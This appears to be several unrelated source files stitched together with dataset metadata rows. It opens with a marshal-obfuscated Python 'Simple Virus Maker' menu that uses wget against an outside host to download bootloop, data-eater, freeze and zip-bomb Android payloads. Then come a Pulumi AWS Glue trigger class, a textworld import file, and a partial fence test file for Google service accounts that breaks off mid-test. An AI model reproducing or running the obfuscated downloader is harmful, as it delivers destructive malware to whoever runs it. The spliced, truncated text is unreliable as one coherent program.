exec(marshal.loads('''c\x00\x00\x00\x00\x00\x00\x00\x00\x1f\x00\x00\x00@\x00\x00\x00s\xb4\x03\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x02\x00Z\x02\x00d\x03\x00Z\x03\x00d\x04\x00Z\x04\x00d\x05\x00Z\x05\x00d\x06\x00e\x02\x00e\x03\x00f\x02\x00\x16GHd\x07\x00e\x04\x00e\x02\x00e\x04\x00e\x02\x00e\x04\x00e\x03\x00f\x06\x00\x16GHd\x08\x00e\x04\x00e\x02\x00e\x04\x00e\x02\x00e\x04\x00e\x03\x00f\x06\x00\x16GHd\t\x00e\x04\x00e\x02\x00e\x04\x00e\x02\x00e\x04\x00e\x03\x00f\x06\x00\x16GHd\x06\x00e\x02\x00e\x03\x00f\x02\x00\x16GHHe\x06\x00d\n\x00e\x04\x00e\x02\x00e\x04\x00e\x02\x00e\x04\x00e\x02\x00e\x05\x00e\x04\x00e\x02\x00e\x04\x00e\x02\x00e\x05\x00e\x04\x00e\x02\x00e\x04\x00e\x02\x00e\x05\x00e\x04\x00e\x02\x00e\x04\x00e\x02\x00e\x05\x00e\x04\x00e\x02\x00e\x04\x00e\x02\x00e\x05\x00e\x02\x00e\x04\x00f\x1d\x00\x16\x83\x01\x00Z\x07\x00e\x07\x00d\x0b\x00k\x02\x00s\x1f\x01e\x07\x00d\x0c\x00k\x02\x00r|\x01d\r\x00e\x04\x00e\x02\x00e\x04\x00e\x05\x00e\x02\x00e\x03\x00f\x06\x00\x16GHe\x00\x00j\x08\x00d\x0e\x00\x83\x01\x00\x01e\x00\x00j\x08\x00d\x0f\x00\x83\x01\x00\x01d\x10\x00e\x04\x00e\x02\x00e\x04\x00e\x05\x00e\x02\x00e\x03\x00f\x06\x00\x16GHe\x01\x00j\t\x00\x83\x00\x00\x01n4\x02e\x07\x00d\x11\x00k\x02\x00s\x94\x01e\x07\x00d\x12\x00k\x02\x00r\xf1\x01d\r\x00e\x04\x00e\x02\x00e\x04\x00e\x05\x00e\x02\x00e\x03\x00f\x06\x00\x16GHe\x00\x00j\x08\x00d\x13\x00\x83\x01\x00\x01e\x00\x00j\x08\x00d\x14\x00\x83\x01\x00\x01d\x10\x00e\x04\x00e\x02\x00e\x04\x00e\x05\x00e\x02\x00e\x03\x00f\x06\x00\x16GHe\x01\x00j\t\x00\x83\x00\x00\x01n\xbf\x01e\x07\x00d\x15\x00k\x02\x00s\t\x02e\x07\x00d\x16\x00k\x02\x00rf\x02d\r\x00e\x04\x00e\x02\x00e\x04\x00e\x05\x00e\x02\x00e\x03\x00f\x06\x00\x16GHe\x00\x00j\x08\x00d\x17\x00\x83\x01\x00\x01e\x00\x00j\x08\x00d\x18\x00\x83\x01\x00\x01d\x10\x00e\x04\x00e\x02\x00e\x04\x00e\x05\x00e\x02\x00e\x03\x00f\x06\x00\x16GHe\x01\x00j\t\x00\x83\x00\x00\x01nJ\x01e\x07\x00d\x19\x00k\x02\x00s~\x02e\x07\x00d\x1a\x00k\x02\x00r\xe8\x02d\r\x00e\x04\x00e\x02\x00e\x04\x00e\x05\x00e\x02\x00e\x03\x00f\x06\x00\x16GHe\x00\x00j\x08\x00d\x1b\x00\x83\x01\x00\x01e\x00\x00j\x08\x00d\x1c\x00\x83\x01\x00\x01e\x00\x00j\x08\x00d\x1d\x00\x83\x01\x00\x01d\x10\x00e\x04\x00e\x02\x00e\x04\x00e\x05\x00e\x02\x00e\x03\x00f\x06\x00\x16GHe\x01\x00j\t\x00\x83\x00\x00\x01n\xc8\x00e\x07\x00d\x1e\x00k\x02\x00s\x00\x03e\x07\x00d\x1f\x00k\x02\x00r]\x03d\r\x00e\x04\x00e\x02\x00e\x04\x00e\x05\x00e\x02\x00e\x03\x00f\x06\x00\x16GHe\x00\x00j\x08\x00d \x00\x83\x01\x00\x01e\x00\x00j\x08\x00d!\x00\x83\x01\x00\x01d\x10\x00e\x04\x00e\x02\x00e\x04\x00e\x05\x00e\x02\x00e\x03\x00f\x06\x00\x16GHe\x01\x00j\t\x00\x83\x00\x00\x01nS\x00d"\x00e\x04\x00e\x02\x00e\x04\x00e\x02\x00e\x04\x00e\x05\x00e\x03\x00f\x07\x00\x16GHe\n\x00j\x0b\x00d#\x00\x83\x01\x00\x01d$\x00e\x04\x00e\x02\x00e\x04\x00e\x02\x00e\x04\x00e\x05\x00e\x03\x00f\x07\x00\x16GHe\x01\x00j\t\x00\x83\x00\x00\x01d\x01\x00S(%\x00\x00\x00i\xff\xff\xff\xffNs\x07\x00\x00\x00\x1b[1;31ms\x04\x00\x00\x00\x1b[0ms\x07\x00\x00\x00\x1b[1;33ms\x07\x00\x00\x00\x1b[1;37ms9\x00\x00\x00%s+---------------------------------------------------+%ssA\x00\x00\x00%s||[#]%s--------------%s[ VBug Maker ]%s---------------%s[#]||%ssA\x00\x00\x00%s||%s |___________%s[ Simple Virus Maker ]%s____________|%s ||%ssA\x00\x00\x00%s||%s |____________%s[ Anvima * Session ]%s_____________|%s ||%ss}\x00\x00\x00 %s[%s*%s] %s(%sB%s)%sootloop %s| %s(%sD%s)%sata-Eater %s| %s(%sF%s)%sreeze %s| %s(%sBO%s)%smb-Zip %s| %s(%sE%s)%slite %s:%s t\x01\x00\x00\x00Bt\x01\x00\x00\x00bs\'\x00\x00\x00\n %s[%s+%s]%s Download the virus%s...%ss3\x00\x00\x00wget -q http://override.waper.co/files/bootloop.apks?\x00\x00\x00mkdir virus/bootloop;mv bootloop.apk virus/bootloop/bootloop.shs\x16\x00\x00\x00 %s[%s+%s]%s Done%s.%st\x01\x00\x00\x00Dt\x01\x00\x00\x00ds3\x00\x00\x00wget -q http://override.waper.co/files/dateater.apksE\x00\x00\x00mkdir virus/data-eater;mv dateater.apk virus/data-eater/data-eater.sht\x01\x00\x00\x00Ft\x01\x00\x00\x00fs1\x00\x00\x00wget -q http://override.waper.co/files/freeze.apks8\x00\x00\x00mkdir virus/freeze;mv freeze.apk virus/freeze/freeze.apkt\x02\x00\x00\x00BOt\x02\x00\x00\x00bos-\x00\x00\x00wget -q http://override.waper.co/files/42.zips-\x00\x00\x00wget -q http://override.waper.co/files/42.apks]\x00\x00\x00mkdir virus/bomb-zip;mv 42.zip virus/bomb-zip/bom-zip.zip;mv 42.apk virus/bomb-zip/README.txtt\x01\x00\x00\x00Et\x01\x00\x00\x00es0\x00\x00\x00wget -q http://override.waper.co/files/31337.apks4\x00\x00\x00mkdir virus/ELITE;mv 31337.apk virus/ELITE/elite.apks&\x00\x00\x00%s[%s%s]%s ERROR%s:%s Wrong Input...%si\x02\x00\x00\x00s,\x00\x00\x00%s[%s!%s]%s ERROR%s:%s Exit the Program...%s(\x0c\x00\x00\x00t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x01\x00\x00\x00Rt\x01\x00\x00\x00Nt\x01\x00\x00\x00Yt\x01\x00\x00\x00Gt\t\x00\x00\x00raw_inputt\r\x00\x00\x00type_of_virust\x06\x00\x00\x00systemt\x04\x00\x00\x00exitt\x04\x00\x00\x00timet\x05\x00\x00\x00sleep(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x03\x00\x00\x00t\x08\x00\x00\x00\x02\x00\x00\x00s^\x00\x00\x00\x0c\x01\x0c\x03\x06\x01\x06\x01\x06\x01\x06\x02\x0f\x01\x1b\x01\x1b\x01\x1b\x01\x0f\x01\x01\x01g\x02\x18\x01\x1b\x01\r\x01\r\x01\x1b\x01\r\x02\x18\x01\x1b\x01\r\x01\r\x01\x1b\x01\r\x02\x18\x01\x1b\x01\r\x01\r\x01\x1b\x01\r\x02\x18\x01\x1b\x01\r\x01\r\x01\r\x01\x1b\x01\r\x02\x18\x01\x1b\x01\r\x01\r\x01\x1b\x01\r\x03\x1e\x01\r\x01\x1e\x01'''))
| 1,086.6
| 5,389
| 0.742315
| 1,174
| 5,433
| 3.391823
| 0.142249
| 0.143144
| 0.127072
| 0.10899
| 0.617027
| 0.593169
| 0.559769
| 0.54445
| 0.520844
| 0.432446
| 0
| 0.339309
| 0.014357
| 5,433
| 4
| 5,390
| 1,358.25
| 0.404295
| 0.004233
| 0
| 0
| 0
| 0.5
| 0.991494
| 0.829512
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 10
|
ed33b5719e4ddc712f879e8f5df1f32866885f13
| 15,205
|
py
|
Python
|
sdk/python/pulumi_aws/glue/trigger.py
|
JakeGinnivan/pulumi-aws
|
c91ef78932964ac74eda7f5da81f65b0f1798c93
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/glue/trigger.py
|
JakeGinnivan/pulumi-aws
|
c91ef78932964ac74eda7f5da81f65b0f1798c93
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/glue/trigger.py
|
JakeGinnivan/pulumi-aws
|
c91ef78932964ac74eda7f5da81f65b0f1798c93
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import json
import warnings
import pulumi
import pulumi.runtime
from typing import Union
from .. import utilities, tables
class Trigger(pulumi.CustomResource):
actions: pulumi.Output[list]
"""
List of actions initiated by this trigger when it fires. Defined below.
* `arguments` (`dict`) - Arguments to be passed to the job. You can specify arguments here that your own job-execution script consumes, as well as arguments that AWS Glue itself consumes.
* `crawlerName` (`str`) - The name of the crawler to be executed. Conflicts with `job_name`.
* `jobName` (`str`) - The name of a job to be executed. Conflicts with `crawler_name`.
* `timeout` (`float`) - The job run timeout in minutes. It overrides the timeout value of the job.
"""
arn: pulumi.Output[str]
"""
Amazon Resource Name (ARN) of Glue Trigger
"""
description: pulumi.Output[str]
"""
A description of the new trigger.
"""
enabled: pulumi.Output[bool]
"""
Start the trigger. Defaults to `true`. Not valid to disable for `ON_DEMAND` type.
"""
name: pulumi.Output[str]
"""
The name of the trigger.
"""
predicate: pulumi.Output[dict]
"""
A predicate to specify when the new trigger should fire. Required when trigger type is `CONDITIONAL`. Defined below.
* `conditions` (`list`) - A list of the conditions that determine when the trigger will fire. Defined below.
* `crawlState` (`str`) - The condition crawl state. Currently, the values supported are `RUNNING`, `SUCCEEDED`, `CANCELLED`, and `FAILED`. If this is specified, `crawler_name` must also be specified. Conflicts with `state`.
* `crawlerName` (`str`) - The name of the crawler to watch. If this is specified, `crawl_state` must also be specified. Conflicts with `job_name`.
* `jobName` (`str`) - The name of the job to watch. If this is specified, `state` must also be specified. Conflicts with `crawler_name`.
* `logicalOperator` (`str`) - A logical operator. Defaults to `EQUALS`.
* `state` (`str`) - The condition job state. Currently, the values supported are `SUCCEEDED`, `STOPPED`, `TIMEOUT` and `FAILED`. If this is specified, `job_name` must also be specified. Conflicts with `crawler_state`.
* `logical` (`str`) - How to handle multiple conditions. Defaults to `AND`. Valid values are `AND` or `ANY`.
"""
schedule: pulumi.Output[str]
"""
A cron expression used to specify the schedule. [Time-Based Schedules for Jobs and Crawlers](https://docs.aws.amazon.com/glue/latest/dg/monitor-data-warehouse-schedule.html)
"""
tags: pulumi.Output[dict]
"""
Key-value map of resource tags
"""
type: pulumi.Output[str]
"""
The type of trigger. Valid values are `CONDITIONAL`, `ON_DEMAND`, and `SCHEDULED`.
"""
workflow_name: pulumi.Output[str]
"""
A workflow to which the trigger should be associated to. Every workflow graph (DAG) needs a starting trigger (`ON_DEMAND` or `SCHEDULED` type) and can contain multiple additional `CONDITIONAL` triggers.
"""
def __init__(__self__, resource_name, opts=None, actions=None, description=None, enabled=None, name=None, predicate=None, schedule=None, tags=None, type=None, workflow_name=None, __props__=None, __name__=None, __opts__=None):
"""
Manages a Glue Trigger resource.
## Example Usage
### Conditional Trigger
```python
import pulumi
import pulumi_aws as aws
example = aws.glue.Trigger("example",
actions=[{
"jobName": aws_glue_job["example1"]["name"],
}],
predicate={
"conditions": [{
"jobName": aws_glue_job["example2"]["name"],
"state": "SUCCEEDED",
}],
},
type="CONDITIONAL")
```
### On-Demand Trigger
```python
import pulumi
import pulumi_aws as aws
example = aws.glue.Trigger("example",
actions=[{
"jobName": aws_glue_job["example"]["name"],
}],
type="ON_DEMAND")
```
### Scheduled Trigger
```python
import pulumi
import pulumi_aws as aws
example = aws.glue.Trigger("example",
actions=[{
"jobName": aws_glue_job["example"]["name"],
}],
schedule="cron(15 12 * * ? *)",
type="SCHEDULED")
```
### Conditional Trigger with Crawler Action
```python
import pulumi
import pulumi_aws as aws
example = aws.glue.Trigger("example",
actions=[{
"crawlerName": aws_glue_crawler["example1"]["name"],
}],
predicate={
"conditions": [{
"jobName": aws_glue_job["example2"]["name"],
"state": "SUCCEEDED",
}],
},
type="CONDITIONAL")
```
### Conditional Trigger with Crawler Condition
```python
import pulumi
import pulumi_aws as aws
example = aws.glue.Trigger("example",
actions=[{
"jobName": aws_glue_job["example1"]["name"],
}],
predicate={
"conditions": [{
"crawlState": "SUCCEEDED",
"crawlerName": aws_glue_crawler["example2"]["name"],
}],
},
type="CONDITIONAL")
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[list] actions: List of actions initiated by this trigger when it fires. Defined below.
:param pulumi.Input[str] description: A description of the new trigger.
:param pulumi.Input[bool] enabled: Start the trigger. Defaults to `true`. Not valid to disable for `ON_DEMAND` type.
:param pulumi.Input[str] name: The name of the trigger.
:param pulumi.Input[dict] predicate: A predicate to specify when the new trigger should fire. Required when trigger type is `CONDITIONAL`. Defined below.
:param pulumi.Input[str] schedule: A cron expression used to specify the schedule. [Time-Based Schedules for Jobs and Crawlers](https://docs.aws.amazon.com/glue/latest/dg/monitor-data-warehouse-schedule.html)
:param pulumi.Input[dict] tags: Key-value map of resource tags
:param pulumi.Input[str] type: The type of trigger. Valid values are `CONDITIONAL`, `ON_DEMAND`, and `SCHEDULED`.
:param pulumi.Input[str] workflow_name: A workflow to which the trigger should be associated to. Every workflow graph (DAG) needs a starting trigger (`ON_DEMAND` or `SCHEDULED` type) and can contain multiple additional `CONDITIONAL` triggers.
The **actions** object supports the following:
* `arguments` (`pulumi.Input[dict]`) - Arguments to be passed to the job. You can specify arguments here that your own job-execution script consumes, as well as arguments that AWS Glue itself consumes.
* `crawlerName` (`pulumi.Input[str]`) - The name of the crawler to be executed. Conflicts with `job_name`.
* `jobName` (`pulumi.Input[str]`) - The name of a job to be executed. Conflicts with `crawler_name`.
* `timeout` (`pulumi.Input[float]`) - The job run timeout in minutes. It overrides the timeout value of the job.
The **predicate** object supports the following:
* `conditions` (`pulumi.Input[list]`) - A list of the conditions that determine when the trigger will fire. Defined below.
* `crawlState` (`pulumi.Input[str]`) - The condition crawl state. Currently, the values supported are `RUNNING`, `SUCCEEDED`, `CANCELLED`, and `FAILED`. If this is specified, `crawler_name` must also be specified. Conflicts with `state`.
* `crawlerName` (`pulumi.Input[str]`) - The name of the crawler to watch. If this is specified, `crawl_state` must also be specified. Conflicts with `job_name`.
* `jobName` (`pulumi.Input[str]`) - The name of the job to watch. If this is specified, `state` must also be specified. Conflicts with `crawler_name`.
* `logicalOperator` (`pulumi.Input[str]`) - A logical operator. Defaults to `EQUALS`.
* `state` (`pulumi.Input[str]`) - The condition job state. Currently, the values supported are `SUCCEEDED`, `STOPPED`, `TIMEOUT` and `FAILED`. If this is specified, `job_name` must also be specified. Conflicts with `crawler_state`.
* `logical` (`pulumi.Input[str]`) - How to handle multiple conditions. Defaults to `AND`. Valid values are `AND` or `ANY`.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
if actions is None:
raise TypeError("Missing required property 'actions'")
__props__['actions'] = actions
__props__['description'] = description
__props__['enabled'] = enabled
__props__['name'] = name
__props__['predicate'] = predicate
__props__['schedule'] = schedule
__props__['tags'] = tags
if type is None:
raise TypeError("Missing required property 'type'")
__props__['type'] = type
__props__['workflow_name'] = workflow_name
__props__['arn'] = None
super(Trigger, __self__).__init__(
'aws:glue/trigger:Trigger',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name, id, opts=None, actions=None, arn=None, description=None, enabled=None, name=None, predicate=None, schedule=None, tags=None, type=None, workflow_name=None):
"""
Get an existing Trigger resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param str id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[list] actions: List of actions initiated by this trigger when it fires. Defined below.
:param pulumi.Input[str] arn: Amazon Resource Name (ARN) of Glue Trigger
:param pulumi.Input[str] description: A description of the new trigger.
:param pulumi.Input[bool] enabled: Start the trigger. Defaults to `true`. Not valid to disable for `ON_DEMAND` type.
:param pulumi.Input[str] name: The name of the trigger.
:param pulumi.Input[dict] predicate: A predicate to specify when the new trigger should fire. Required when trigger type is `CONDITIONAL`. Defined below.
:param pulumi.Input[str] schedule: A cron expression used to specify the schedule. [Time-Based Schedules for Jobs and Crawlers](https://docs.aws.amazon.com/glue/latest/dg/monitor-data-warehouse-schedule.html)
:param pulumi.Input[dict] tags: Key-value map of resource tags
:param pulumi.Input[str] type: The type of trigger. Valid values are `CONDITIONAL`, `ON_DEMAND`, and `SCHEDULED`.
:param pulumi.Input[str] workflow_name: A workflow to which the trigger should be associated to. Every workflow graph (DAG) needs a starting trigger (`ON_DEMAND` or `SCHEDULED` type) and can contain multiple additional `CONDITIONAL` triggers.
The **actions** object supports the following:
* `arguments` (`pulumi.Input[dict]`) - Arguments to be passed to the job. You can specify arguments here that your own job-execution script consumes, as well as arguments that AWS Glue itself consumes.
* `crawlerName` (`pulumi.Input[str]`) - The name of the crawler to be executed. Conflicts with `job_name`.
* `jobName` (`pulumi.Input[str]`) - The name of a job to be executed. Conflicts with `crawler_name`.
* `timeout` (`pulumi.Input[float]`) - The job run timeout in minutes. It overrides the timeout value of the job.
The **predicate** object supports the following:
* `conditions` (`pulumi.Input[list]`) - A list of the conditions that determine when the trigger will fire. Defined below.
* `crawlState` (`pulumi.Input[str]`) - The condition crawl state. Currently, the values supported are `RUNNING`, `SUCCEEDED`, `CANCELLED`, and `FAILED`. If this is specified, `crawler_name` must also be specified. Conflicts with `state`.
* `crawlerName` (`pulumi.Input[str]`) - The name of the crawler to watch. If this is specified, `crawl_state` must also be specified. Conflicts with `job_name`.
* `jobName` (`pulumi.Input[str]`) - The name of the job to watch. If this is specified, `state` must also be specified. Conflicts with `crawler_name`.
* `logicalOperator` (`pulumi.Input[str]`) - A logical operator. Defaults to `EQUALS`.
* `state` (`pulumi.Input[str]`) - The condition job state. Currently, the values supported are `SUCCEEDED`, `STOPPED`, `TIMEOUT` and `FAILED`. If this is specified, `job_name` must also be specified. Conflicts with `crawler_state`.
* `logical` (`pulumi.Input[str]`) - How to handle multiple conditions. Defaults to `AND`. Valid values are `AND` or `ANY`.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
__props__["actions"] = actions
__props__["arn"] = arn
__props__["description"] = description
__props__["enabled"] = enabled
__props__["name"] = name
__props__["predicate"] = predicate
__props__["schedule"] = schedule
__props__["tags"] = tags
__props__["type"] = type
__props__["workflow_name"] = workflow_name
return Trigger(resource_name, opts=opts, __props__=__props__)
def translate_output_property(self, prop):
return tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return tables._SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| 53.727915
| 250
| 0.643473
| 1,867
| 15,205
| 5.108731
| 0.124264
| 0.047285
| 0.039631
| 0.016356
| 0.806563
| 0.792619
| 0.782554
| 0.766408
| 0.746278
| 0.746278
| 0
| 0.000965
| 0.250444
| 15,205
| 282
| 251
| 53.91844
| 0.835922
| 0.538112
| 0
| 0.027778
| 1
| 0
| 0.141149
| 0.006999
| 0
| 0
| 0
| 0
| 0
| 1
| 0.055556
| false
| 0.013889
| 0.083333
| 0.027778
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ed6a24f392ac6cea024b410e1255cd8d3d5e4ca3
| 311
|
py
|
Python
|
textworld/envs/wrappers/__init__.py
|
CORGI-lab/Learning_from_stories
|
183791971272fd919822ab43fc11369d9098fc69
|
[
"MIT"
] | null | null | null |
textworld/envs/wrappers/__init__.py
|
CORGI-lab/Learning_from_stories
|
183791971272fd919822ab43fc11369d9098fc69
|
[
"MIT"
] | null | null | null |
textworld/envs/wrappers/__init__.py
|
CORGI-lab/Learning_from_stories
|
183791971272fd919822ab43fc11369d9098fc69
|
[
"MIT"
] | null | null | null |
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT license.
from textworld.envs.wrappers.viewer import HtmlViewer
from textworld.envs.wrappers.recorder import Recorder
from textworld.envs.wrappers.filter import Filter
from textworld.envs.wrappers.tw_inform7 import TWInform7
| 34.555556
| 59
| 0.836013
| 41
| 311
| 6.317073
| 0.585366
| 0.200772
| 0.262548
| 0.3861
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007168
| 0.102894
| 311
| 8
| 60
| 38.875
| 0.921147
| 0.286174
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
9c5de8adca73df0b1d8151439053aefa9d018a87
| 34,711
|
py
|
Python
|
tests/google/test_service_accounts.py
|
ADParedes/fence
|
81afd1914c483da5514d0bcc13ecbfda9758dd9f
|
[
"Apache-2.0"
] | null | null | null |
tests/google/test_service_accounts.py
|
ADParedes/fence
|
81afd1914c483da5514d0bcc13ecbfda9758dd9f
|
[
"Apache-2.0"
] | 1
|
2019-11-01T08:30:28.000Z
|
2019-11-01T08:30:28.000Z
|
tests/google/test_service_accounts.py
|
ADParedes/fence
|
81afd1914c483da5514d0bcc13ecbfda9758dd9f
|
[
"Apache-2.0"
] | 3
|
2019-10-16T04:27:54.000Z
|
2019-10-24T02:27:52.000Z
|
"""
Tests for the /google/service_accounts endpoints.
NOTE: You can use the following helper assert functions when developing more
tests:
_assert_expected_service_account_response_structure(data)
- Verifies that the structure of the response represents a service
account
- This is essentially a schema check against:
{
"service_account_email": "string",
"google_project_id": "string",
"project_access": [
"string"
]
}
_assert_expected_error_response_structure(data, project_access)
- Verifies that the structure of the response represents an
error response with info
- provide which projects you expect error information for in
project_access
- This is essentially a schema check against:
{
"success": bool,
"errors": {
"service_account_email": {
"status": int,
"error": "string",
"error_description": "string"
},
"google_project_id": {
"status": int,
"error": "string",
"error_description": "string"
},
"project_access": {
"ProjectA": {
"status": int,
"error": "string",
"error_description": "string"
},
"ProjectB": {
"status": int,
"error": "string",
"error_description": "string"
},
...
}
}
}
"""
import json
import pytest
import time
from datetime import datetime
from io import StringIO
from urllib.parse import quote
from fence.models import (
Bucket,
Project,
ProjectToBucket,
GoogleBucketAccessGroup,
UserServiceAccount,
ServiceAccountAccessPrivilege,
ServiceAccountToGoogleBucketAccessGroup,
)
from fence.config import config
from unittest.mock import MagicMock, patch, mock_open
EXPECTED_ERROR_RESPONSE_KEYS = set(["status", "error", "error_description"])
def test_google_service_account_monitor_none(
client, app, encoded_jwt_service_accounts_access, monkeypatch
):
"""
Test that the monitoring endpoint returns something when no creds
exist.
"""
encoded_creds_jwt = encoded_jwt_service_accounts_access["jwt"]
test_file = None
monkeypatch.setitem(
config, "CIRRUS_CFG", {"GOOGLE_APPLICATION_CREDENTIALS": test_file}
)
response = client.get(
"/google/service_accounts/monitor",
headers={"Authorization": "Bearer " + encoded_creds_jwt},
)
assert response.status_code == 404
def test_google_service_account_monitor(
client, app, encoded_jwt_service_accounts_access, monkeypatch
):
"""
Test that the monitoring endpoint returns something when given valid
creds.
"""
encoded_creds_jwt = encoded_jwt_service_accounts_access["jwt"]
creds_file = '{"client_email": "test123@example.com"}'
path_mock = MagicMock()
path_mock.return_value.path.return_value.exists.return_value = True
mock_path = patch("fence.blueprints.google.os", path_mock)
# mock_path = patch('os.path.exists', True)
mocked_open = patch("builtins.open", mock_open(read_data=creds_file))
monkeypatch.setitem(config, "CIRRUS_CFG", {"GOOGLE_APPLICATION_CREDENTIALS": "."})
mocked_open.start()
mock_path.start()
response = client.get(
"/google/service_accounts/monitor",
headers={"Authorization": "Bearer " + encoded_creds_jwt},
)
mocked_open.stop()
mock_path.stop()
assert response.status_code == 200
assert response.json and "service_account_email" in response.json
assert response.json["service_account_email"] == "test123@example.com"
def test_patch_service_account_no_project_change(
client,
app,
db_session,
encoded_jwt_service_accounts_access,
register_user_service_account,
user_can_manage_service_account_mock,
valid_user_service_account_mock,
revoke_user_service_account_from_google_mock,
add_user_service_account_to_google_mock,
):
"""
Test that patching with no arg project_access successfully extends
access for all projects the service account currently has access to.
"""
encoded_creds_jwt = encoded_jwt_service_accounts_access["jwt"]
service_account = register_user_service_account["service_account"]
response = client.patch(
"/google/service_accounts/{}".format(quote(service_account.email)),
headers={"Authorization": "Bearer " + encoded_creds_jwt},
content_type="application/json",
)
# check if success
assert str(response.status_code).startswith("2")
service_account_accesses = (
db_session.query(ServiceAccountToGoogleBucketAccessGroup).filter_by(
service_account_id=service_account.id
)
).all()
# ensure access is the same
assert len(service_account_accesses) == len(
register_user_service_account["bucket_access_groups"]
)
# make sure we actually extended access past the current time
for access in service_account_accesses:
assert access.expires > int(time.time())
def test_patch_service_account_expires_in(
client,
app,
db_session,
encoded_jwt_service_accounts_access,
register_user_service_account,
user_can_manage_service_account_mock,
valid_user_service_account_mock,
revoke_user_service_account_from_google_mock,
add_user_service_account_to_google_mock,
):
"""
Test that patching with a valid expires_in successfully extends
access, and patching with an invalid expires_in does not.
"""
encoded_creds_jwt = encoded_jwt_service_accounts_access["jwt"]
service_account = register_user_service_account["service_account"]
# invalid expires_in: should fail
requested_exp = "abc" # expires_in must be int >0
response = client.patch(
"/google/service_accounts/{}?expires_in={}".format(
quote(service_account.email), requested_exp
),
headers={"Authorization": "Bearer " + encoded_creds_jwt},
content_type="application/json",
)
assert response.status_code == 400 # check if failure
# valid expires_in: should succeed
requested_exp = 60
response = client.patch(
"/google/service_accounts/{}?expires_in={}".format(
quote(service_account.email), requested_exp
),
headers={"Authorization": "Bearer " + encoded_creds_jwt},
content_type="application/json",
)
assert str(response.status_code).startswith("2") # check if success
# make sure the access was extended of the requested time
# (allow up to 10 sec for runtime)
service_account_accesses = (
db_session.query(ServiceAccountToGoogleBucketAccessGroup).filter_by(
service_account_id=service_account.id
)
).all()
for access in service_account_accesses:
diff = access.expires - int(time.time())
assert requested_exp <= diff <= requested_exp + 10
def test_patch_service_account_dry_run_valid_empty_arg(
client,
app,
db_session,
encoded_jwt_service_accounts_access,
register_user_service_account,
user_can_manage_service_account_mock,
valid_user_service_account_mock,
revoke_user_service_account_from_google_mock,
add_user_service_account_to_google_mock,
):
"""
Test that patching with no arg project_access against _dry_run says the PATCH
would successfully extend access.
"""
encoded_creds_jwt = encoded_jwt_service_accounts_access["jwt"]
service_account = register_user_service_account["service_account"]
response = client.patch(
"/google/service_accounts/_dry_run/{}".format(quote(service_account.email)),
headers={"Authorization": "Bearer " + encoded_creds_jwt},
content_type="application/json",
)
# check if success
assert str(response.status_code).startswith("2")
assert "success" in response.json
assert response.json.get("success")
service_account_accesses = (
db_session.query(ServiceAccountToGoogleBucketAccessGroup).filter_by(
service_account_id=service_account.id
)
).all()
# ensure access is the same as before
assert len(service_account_accesses) == len(
register_user_service_account["bucket_access_groups"]
)
def test_patch_service_account_dry_run_valid_new_access(
client,
app,
db_session,
encoded_jwt_service_accounts_access,
register_user_service_account,
user_can_manage_service_account_mock,
valid_user_service_account_mock,
revoke_user_service_account_from_google_mock,
add_user_service_account_to_google_mock,
):
"""
Test that patching with new project_access against _dry_run says the PATCH
would successfully extend access if it's valid. BUT make sure it does NOT
actually change the access.
"""
encoded_creds_jwt = encoded_jwt_service_accounts_access["jwt"]
service_account = register_user_service_account["service_account"]
response = client.patch(
"/google/service_accounts/_dry_run/{}".format(quote(service_account.email)),
headers={"Authorization": "Bearer " + encoded_creds_jwt},
content_type="application/json",
data={"project_access": ["another-valid-project"]},
)
# check if success
